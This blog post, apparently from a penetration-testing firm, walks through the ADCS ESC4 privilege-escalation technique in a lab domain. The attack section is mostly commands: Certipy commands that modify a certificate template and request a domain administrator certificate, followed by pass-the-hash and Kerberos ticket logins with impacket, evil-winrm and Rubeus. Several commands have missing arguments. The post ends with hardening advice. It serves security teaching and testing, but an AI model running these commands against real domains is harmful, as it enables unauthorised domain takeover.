Active Directory Certificate Services (ADCS – ESC4)

ADCS Part IVIntroduction

In PART 3 of this short ADCS series, we provided an overview of Active Directory Certificate Services and demonstrated ESC3, one of the escalation techniques. This post will walk you through ESC4, another escalation technique involving misconfigurations on the certificate template. These security issues arise when a non-administrator account can modify a certificate template and as a result gain access to privileged resources such as domain controller. Such misconfigurations can occur when a domain user group member is granted the following template security permissions: Owner, WriteOwnerPrincipals, WriteDaclPrincipals, or WritePropertyPrincipals.

Prerequisites – ESC4 Attack

The ESC4 is a post-exploitation attack that can be only performed once we either gain a foothold on the internal network or use a white box penetration testing approach; in other words, if the client provides domain admin credentials, the following are the requirements:

  • Valid credential – (pcoulson)
  • Vulnerable Certificate Template – ESC4
  • Certipy
  • BloodHound
  • impacket Tools
  • evil-winrm
  • PKINITtools

ESC4 – Attack

To find a vulnerable template, we can use Certipy below command:

certipy find -dc-ip -u pcoulson -p 'P4ssw0rd123456@'

Certipy generates outputs in JSON and TXT file formats. These files are named “_Certipy” and can be found in the current folder.

The 20240525140107_Certipy.txt file contains the vulnerable templates. However, we must identify it manually by opening the file with a regular text editor or using cat along with the grep command.

cat 20240525140107_Certipy.txt | grep "ESC4"

Additionally, Certipy runs BloodHound collectors that produce a zip file with the same naming convention. These BloodHound results can be imported into your BloodHound database to visualize potential domain privilege escalation paths.

  • Certipy generates BloodHound data that can be ingested into the BloodHound, v5.8.1, which can be found here: BloodHound.
  • Note: To import certipy data on the new Bloodhound v5.8.1, utilize bloodhound-python/latest SharpHound, and after collecting the data, proceed to upload it into Bloodhound v5.8.1.
  • We must specify the -old bloodhound flag to use the old version of BloodHound.
  • Note: If we opt for an older version of Bloodhound, you must use the corresponding older SharpHound version. After collecting the data, upload it to Bloodhound.
certipy find -u pcoulson -p 'P4ssw0rd123456@' -dc-ip -old-bloodhound 

certipy find -u pcoulson -p 'P4ssw0rd123456@' -dc-ip -vulnerable -enabled -old-bloodhound

In the image below, we can see that the user “pcoulson” is a member of the “DOMAIN USER” group and has enrollment rights for the “ESC4” template. Additionally, the user has permissions such as Owner, WriteOwnerPrincipals, WriteDaclPrincipals, and WritePropertyPrincipals for the template. These permissions allow users or groups to modify and enroll for certificates based on that template. When creating a certificate template in ADCS, we can specify who has the right to enroll for certificates using that template.

The certificate ESC4 has a vulnerable configuration due to the following factors:

  • Template Security Permissions: Owner, WriteOwnerPrincipals, WriteDaclPrincipals, WritePropertyPrincipals.
  • Enabled: True
  • Enrollment Rights are set to SHIELD. LOCAL/Domain Users — In other words, any domain user can request a certificate on behalf of a Domain Admin

ESC4 Attack Walkthrough on Linux

A misconfiguration in the ESC4 certificate template allows users with low privileges to modify a template, which can be utilized by making it vulnerable to ESC1/ESC2/ESC3 and requesting an administrator certificate. In other words, if a domain user has these permissions over a template: Owner, WriteOwnerPrincipals, WriteDaclPrincipals, and WritePropertyPrincipals, they can abuse it to perform ESC1 and become domain admin.

The ESC4 template has the following security issues, making it vulnerable:

  • Enabled: True
  • Requires Manager Approval: FALSE
  • Template Security Permissions: Owner, WriteOwnerPrincipals, WriteDaclPrincipals, WritePropertyPrincipals.

Once we have identified the vulnerable template, our next step is to make it vulnerable to ESC1. Since our initial user account, “pcoulson,” is part of the Domain Users group, we have the correct permissions to do so.

certipy template -dc-ip -u pcoulson -p 'P4ssw0rd123456@' -template ESC4 -target DC4.shield.local -save-old
certipy req -ca SHIELD-DC4-CA -dc-ip -u pcoulson -p 'P4ssw0rd123456@' -template ESC4 -target DC4.shield.local -upn administrator@shield.local

Once we have obtained the .pfx certificate file, we can request the domain admin TGT Ticket or the administrator hash to gain access to the domain controller.

certipy auth -pfx administrator.pfx
certipy template -dc-ip -u pcoulson -p 'P4ssw0rd123456@' -template ESC4 -target DC4.shield.local -configuration ESC4.json

Gaining Access to DC via Pass-The-Hash Technique

Once we obtain either the administrator hash or the TGT Ticket, we can use different tools to log into the Domain Controller, such as:

  • impacket-smbexec
  • impacket-psexec
  • evil-winrm
  • NetExec
impacket-smbexec administrator@dc4.shield.local -hashes aad3b435b51404eeaad3b435b51404ee:c5153b43885058f27715b476e5246a50
evil-winrm -i dc4.shield.local -u Administrator -H c5153b43885058f27715b476e5246a50

Gaining Access to DC using a TGT Ticket

To obtain the administrator TGT ticket, we can use certipy with the auth flag.

certipy auth -pfx administrator.pfx

Once we obtain the TGT Ticket, we can export the administrator.ccache file with the below command, and log in to the DC using impacket-psexec.

export KRB5CCNAME=administrator.ccache

impacket-psexec administrator@dc4.shield.local -k -no-pass

To obtain the administrator TGT ticket, we can use in conjunction with the -cert-pfx flag.

python shield.local/administrator -cert-pfx /root/MARVEL.local/ADCS/administrator.pfx PKINIT-Administartor.ccache

After obtaining the TGT Ticket, we can export the administrator.ccache file using the command below and log in to the DC using impacket-psexec.

export KRB5CCNAME=PKINIT-Administrator.ccache
impacket-psexec administrator@dc4.shield.local -k -no-pass

ESC4 Attack Walkthrough on Windows

# IMPORTANT NOTE : You have to have Python3 pre-installed on the windows host if not then u have to install it.

pip install certipy-ad  
certipy find -dc-ip -sspi

We MUST use the -sspi option to use Windows Integrated Authentication (SSPI). In other words, we will use the user’s context with which we are logged in. In our case, it was pcoulson.

certipy template -dc-ip -template ESC4 -target DC4.shield.local -save-old -sspi

certipy req -ca SHIELD-DC4-CA -dc-ip -template ESC4 -target DC4.shield.local -upn administrator@shield.local -sspi
certipy auth -pfx administrator.pfx

Now that we have the hashes and the TGT file, we can use them for post-exploitation techniques, such as Past-The-Hash, or use the TGT Ticket (.ccache file) to log in.

set KRB5CCNAME=administrator.ccache

c:\users\lowpriv\appdata\local\programs\python\python312\scripts\ shield.local administrator@dc4.shield.local -k -no-pass

#We can use either a Windows Powershell or CMD if we want to use the hash.

c:\users\lowpriv\appdata\local\programs\python\python312\scripts\ shield.local/administrator@dc4.shield.local -hashes aad3b435b51404eeaad3b435b51404ee:c5153b43885058f27715b476e5246a50
Rubeus.exe asktgt /user:administrator /certificate:administrator.pfx /nowrap /getcredentials
Rubeus.exe asktgt /domain:shield.local /user:administrator /rc4:C5153B43885058F27715B476E5246A50 /ptt

Video Walkthrough


As we know by now, Active Directory Certificate Services (ADCS) is a tool whose security hinges on the proper configuration and is particularly susceptible to misconfigurations that can pose significant risks, including unauthorized access and privilege escalation within the domain. These misconfigurations are often unintentional but can seriously compromise security if not addressed.

Therefore, to prevent unauthorized access, conduct regular penetration tests at least twice a year or engage in adversary emulation assessments to ensure that security measures are effective and configurations are sound. While we do not claim to know every security issue related to ADCS, we are committed to offering a wealth of guidance to help navigate and secure this critical infrastructure.

Here are some initial steps to enhance your ADCS security:

  • Audit Certificate Templates: Review all enabled certificate templates and disable those not actively used.
  • Restrict Template Permissions: Limit template permissions to only those groups and users that absolutely need them. Ensure enrollment permissions are tightly controlled.
  • Enforce Issuance Requirements: Configure “Issuance Requirements” to require manual approval for certificate issuance.
  • Adhere to the Principle of Least Privilege: Ensure that permissions are not overly permissive, especially for low-privileged users. Only grant the minimum necessary permissions.
  • Remove Client Authentication: Eliminate the “Client Authentication” function wherever it is not necessary.
  • Credentials from Password Stores – T1555
  • Steal or Forge Authentication Certificates – T1649
  • Pass The Hash – T1550.002
  • Steal or Forge Kerberos Tickets – T1558
  • Pass the Ticket – T1550.003

Credits & References


  • Red Team Lead

    As a security computer expert with over 15 years of experience, he specializes in various areas such as web applications, cloud computing (AWS, Azure & GCP), infrastructure penetration testing, red & purple team assessments, vulnerability analysis, exploit development, and malware analysis. He has conducted numerous successful black-and-grey box penetration testing and adversary emulation engagements throughout his career. He has demonstrated expertise in testing SOAP and RESTful web API services, thick clients, wireless networks, internal/external assessments, SAP ERP servers, ATMs, Tactics Techniques and Procedures (TTPs), and forensics.

Share the Post:

Subscribe To Our Blog